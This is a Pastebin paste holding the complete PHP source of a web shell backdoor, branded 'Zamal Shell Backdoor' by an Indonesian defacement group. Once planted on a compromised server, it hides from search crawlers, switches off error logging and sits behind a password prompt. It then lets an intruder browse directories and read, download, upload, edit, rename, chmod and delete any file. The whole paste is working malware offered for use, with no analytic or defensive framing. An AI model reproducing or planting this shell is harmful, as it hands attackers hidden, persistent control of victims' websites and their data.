API tools faq
paste
Advertisement
Guest User

Shell Indoject Squad

a guest
Aug 22nd, 2019
131
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.22 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12.  
  13. $auth_pass = "9e9947d75380f2e20f405ee8c0ec61cd"; // default: INDONESIAN INJECTION
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>Login Shell Dulu Mek!</title>
  31. <style type="text/css">
  32. html {
  33. margin: 20px auto;
  34. background: #000000;
  35. color: green;
  36. text-align: center;
  37. }
  38. header {
  39. color: green;
  40. margin: 10px auto;
  41. }
  42. input[type=password] {
  43. width: 250px;
  44. height: 25px;
  45. color: red;
  46. background: #000000;
  47. border: 1px dotted green;
  48. padding: 5px;
  49. margin-left: 20px;
  50. text-align: center;
  51. }
  52. </style>
  53. </head>
  54. <center><img src="https://www.upload.ee/image/10380908/20190821_104913.jpg" width="500" height="500"></center>
  55. <form method="post">
  56. <input type="password" name="pass">
  57. </form>
  58. <?php
  59. exit;
  60. }
  61. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  62. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  63. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  64. else
  65. login_shell();
  66. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  67. @ob_clean();
  68. $file = $_GET['file'];
  69. header('Content-Description: File Transfer');
  70. header('Content-Type: application/octet-stream');
  71. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  72. header('Expires: 0');
  73. header('Cache-Control: must-revalidate');
  74. header('Pragma: public');
  75. header('Content-Length: ' . filesize($file));
  76. readfile($file);
  77. exit;
  78. }
  79. ?>
  80. <?php
  81. error_reporting(0);
  82. set_time_limit(0);
  83.  
  84. if(get_magic_quotes_gpc()){
  85. foreach($_POST as $key=>$value){
  86. $_POST[$key] = stripslashes($value);
  87. }
  88. }
  89. echo '<!DOCTYPE HTML>
  90. <html>
  91. <head>
  92. <body bgcolor="black"><center>
  93. <link href="" rel="stylesheet" type="text/json_decode">
  94. <title>Zamal Shell Backdoor</title>
  95. <style>
  96. body{
  97. background-colour: green;
  98.  
  99. }
  100. #content tr:hover{
  101. background-color: blue;
  102. text-shadow:0px 0px 12px #fff;
  103. }
  104. #content .first{
  105. background-colour: red;
  106. }
  107. table{
  108. border: 2px #15d6c8 dotted;
  109. }
  110. a{
  111. color:green;
  112. text-decoration: iceland;
  113. }
  114. a:hover{
  115. color:blue;
  116. text-shadow:0px 0px 10px #ffffff;
  117. }
  118. input,select,textarea{
  119. border: 1px #c13e1c solid;
  120. -moz-border-radius: 5px;
  121. -webkit-border-radius:5px;
  122. border-radius:5px;
  123. }
  124. </style>
  125. </head>
  126. <body>
  127. <center><br><br>
  128. <img border="0" src="https://www.upload.ee/image/10380918/Family_Of_Ijs_20190816_183826.jpg" width="500" height="500">
  129. </center>
  130. <h3><font color="green" Zamaludin | INDOJECT SQUAD </h3></font.
  131. <div class="greetings">
  132. * INDOJECT SQUAD 2k18 *
  133. </div><br>
  134. We Are Ordinary People To The Darkside ~ <br><br>
  135. <div class="barlink">
  136. -=- <a href="https://m.facebook.com/Indoject-Squad-Official-484819272331424">FaceBook</a> -=-
  137. <br>
  138. -=- <a href="https://hackersid.com/archive/team/indoject-squad">HackersId</a> -=-
  139. <a href="https://defacer.id/archive/team/indoject-squad">DefacerId</a> -=-
  140. <br>
  141.  
  142. </div><br>
  143. <table width="770" border="0" cellpadding="3" cellspacing="1" align="center">
  144. <tr><td><font color="white">Path :</font> ';
  145. if(isset($_GET['path'])){
  146. $path = $_GET['path'];
  147. }else{
  148. $path = getcwd();
  149. }
  150. $path = str_replace('\\','/',$path);
  151. $paths = explode('/',$path);
  152.  
  153. foreach($paths as $id=>$pat){
  154. if($pat == '' && $id == 0){
  155. $a = true;
  156. echo '<a href="?path=/">/</a>';
  157. continue;
  158. }
  159. if($pat == '') continue;
  160. echo '<a href="?path=';
  161. for($i=0;$i<=$id;$i++){
  162. echo "$paths[$i]";
  163. if($i != $id) echo "/";
  164. }
  165. echo '">'.$pat.'</a>/';
  166. }
  167. echo '</td></tr><tr><td>';
  168. if(isset($_FILES['file'])){
  169. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  170. echo '<font color="blue">Upload Berhasil</font><br />';
  171. }else{
  172. echo '<font color="red">Upload Gagal</font><br/>';
  173. }
  174. }
  175. echo '<form enctype="multipart/form-data" method="POST">
  176. <font color="white">File Upload :</font> <input type="file" name="file" />
  177. <input type="submit" value="upload" />
  178. </form>
  179. </td></tr>';
  180. if(isset($_GET['filesrc'])){
  181. echo "<tr><td>Current File : ";
  182. echo $_GET['filesrc'];
  183. echo '</tr></td></table><br />';
  184. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  185. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  186. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  187. if($_POST['opt'] == 'chmod'){
  188. if(isset($_POST['perm'])){
  189. if(chmod($_POST['path'],$_POST['perm'])){
  190. echo '<font color="#b8cdea">Berhasil Ganti Permission Coy :D </font><br/>';
  191. }else{
  192. echo '<font color="#788fae">Yah Gagal Ganti Permission :( </font><br />';
  193. }
  194. }
  195. echo '<form method="POST">
  196. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  197. <input type="hidden" name="path" value="'.$_POST['path'].'">
  198. <input type="hidden" name="opt" value="chmod">
  199. <input type="submit" value="Enter" />
  200. </form>';
  201. }elseif($_POST['opt'] == 'ganti nama'){
  202. if(isset($_POST['newname'])){
  203. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  204. echo '<font color="">sukses ganti nama</font><br/>';
  205. }else{
  206. echo '<font color="red">Ganti Nama Gagal</font><br />';
  207. }
  208. $_POST['name'] = $_POST['newname'];
  209. }
  210. echo '<form method="POST">
  211. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  212. <input type="hidden" name="path" value="'.$_POST['path'].'">
  213. <input type="hidden" name="opt" value="rename">
  214. <input type="submit" value="Go" />
  215. </form>';
  216. }elseif($_POST['opt'] == 'edit'){
  217. if(isset($_POST['src'])){
  218. $fp = fopen($_POST['path'],'w');
  219. if(fwrite($fp,$_POST['src'])){
  220. echo '<font color="green">Berhasil Edit Coy :)</font><br/>';
  221. }else{
  222. echo '<font color="red">Gagal Edit</font><br/>';
  223. }
  224. fclose($fp);
  225. }
  226. echo '<form method="POST">
  227. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  228. <input type="hidden" name="path" value="'.$_POST['path'].'">
  229. <input type="hidden" name="opt" value="edit">
  230. <input type="submit" value="Save" />
  231. </form>';
  232. }
  233. echo '</center>';
  234. }else{
  235. echo '</table><br/><center>';
  236. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  237. if($_POST['type'] == 'dir'){
  238. if(rmdir($_POST['path'])){
  239. echo '<font color="green">Directory Terhapus Coy :V </font><br/>';
  240. }else{
  241. echo '<font color="red">Directory Gagal Terhapus </font><br/>';
  242. }
  243. }elseif($_POST['type'] == 'file'){
  244. if(unlink($_POST['path'])){
  245. echo '<font color="green">File Berhsil Terhapus </font><br/>';
  246. }else{
  247. echo '<font color="red">Yah Filenya Gagal Dihapus</font><br/>';
  248. }
  249. }
  250. }
  251. echo '</center>';
  252. $scandir = scandir($path);
  253. echo '<div id="content"><table width="800" border="0" cellpadding="3" cellspacing="1" align="center">
  254. <tr class="first">
  255. <td><center>Nama nya </SCA></center></td>
  256. <td><center>Ukuran Nya </SCA></center></td>
  257. <td><center>Permission Nya </peller></center></td>
  258. <td><center>Memodifikasi Nya</SCA></center></td>
  259. </tr>';
  260.  
  261. foreach($scandir as $dir){
  262. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  263. echo '<tr>
  264. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  265. <td><center>--</center></td>
  266. <td><center>';
  267. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  268. elseif(!is_readable($path.'/'.$dir)) echo '<font color="white">';
  269. echo perms($path.'/'.$dir);
  270. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  271.  
  272. echo '</center></td>
  273. <td><center><form method="POST" action="?option&path='.$path.'">
  274. <select name="opt">
  275. <option value="">Pilih Menu</option>
  276. <option value="delete">Delete </option>
  277. <option value="chmod">Chmod</option>
  278. <option value="rename">Edit Nama</option>
  279. </select>
  280. <input type="hidden" name="type" value="dir">
  281. <input type="hidden" name="name" value="'.$dir.'">
  282. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  283. <input type="submit" value=">">
  284. </form></center></td>
  285. </tr>';
  286. }
  287. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  288. foreach($scandir as $file){
  289. if(!is_file($path.'/'.$file)) continue;
  290. $size = filesize($path.'/'.$file)/1024;
  291. $size = round($size,3);
  292. if($size >= 1024){
  293. $size = round($size/1024,2).' MB';
  294. }else{
  295. $size = $size.' KB';
  296. }
  297.  
  298. echo '<tr>
  299. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  300. <td><center>'.$size.'</center></td>
  301. <td><center>';
  302. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  303. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  304. echo perms($path.'/'.$file);
  305. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  306. echo '</center></td>
  307. <td><center><form method="POST" action="?option&path='.$path.'">
  308. <select name="opt">
  309. <option value="">Pilih Menu Coy</option>
  310. <option value="delete">Delete Dlu Coy</ption>
  311. <option value="chmod">Chmod Dulu </option>
  312. <option value="rename">Ganti Nama </option>
  313. <option value="edit">Edit </option>
  314. </select>
  315. <input type="hidden" name="type" value="file">
  316. <input type="hidden" name="name" value="'.$file.'">
  317. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  318. <input type="submit" value=">">
  319. </form></center></td>
  320. </tr>';
  321. }
  322. echo '</table>
  323. </div>';
  324. }
  325. echo '<center><br/><size="6"CopyRight Sunda Cyber Army</center>
  326. </body>
  327. </html>';
  328. function perms($file){
  329. $perms = fileperms($file);
  330.  
  331. if (($perms & 0xC000) == 0xC000) {
  332. // Socket
  333. $info = 's';
  334. } elseif (($perms & 0xA000) == 0xA000) {
  335. // Symbolic Link
  336. $info = 'l';
  337. } elseif (($perms & 0x8000) == 0x8000) {
  338. // Regular
  339. $info = '-';
  340. } elseif (($perms & 0x6000) == 0x6000) {
  341. // Block special
  342. $info = 'b';
  343. } elseif (($perms & 0x4000) == 0x4000) {
  344. // Directory
  345. $info = 'd';
  346. } elseif (($perms & 0x2000) == 0x2000) {
  347. // Character special
  348. $info = 'c';
  349. } elseif (($perms & 0x1000) == 0x1000) {
  350. // FIFO pipe
  351. $info = 'p';
  352. } else {
  353. // Unknown
  354. $info = 'u';
  355. }
  356.  
  357. // Owner
  358. $info .= (($perms & 0x0100) ? 'r' : '-');
  359. $info .= (($perms & 0x0080) ? 'w' : '-');
  360. $info .= (($perms & 0x0040) ?
  361. (($perms & 0x0800) ? 's' : 'x' ) :
  362. (($perms & 0x0800) ? 'S' : '-'));
  363.  
  364. // Group
  365. $info .= (($perms & 0x0020) ? 'r' : '-');
  366. $info .= (($perms & 0x0010) ? 'w' : '-');
  367. $info .= (($perms & 0x0008) ?
  368. (($perms & 0x0400) ? 's' : 'x' ) :
  369. (($perms & 0x0400) ? 'S' : '-'));
  370.  
  371. // World
  372. $info .= (($perms & 0x0004) ? 'r' : '-');
  373. $info .= (($perms & 0x0002) ? 'w' : '-');
  374. $info .= (($perms & 0x0001) ?
  375. (($perms & 0x0200) ? 't' : 'x' ) :
  376. (($perms & 0x0200) ? 'T' : '-'));
  377.  
  378. return $info;
  379. }
  380. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!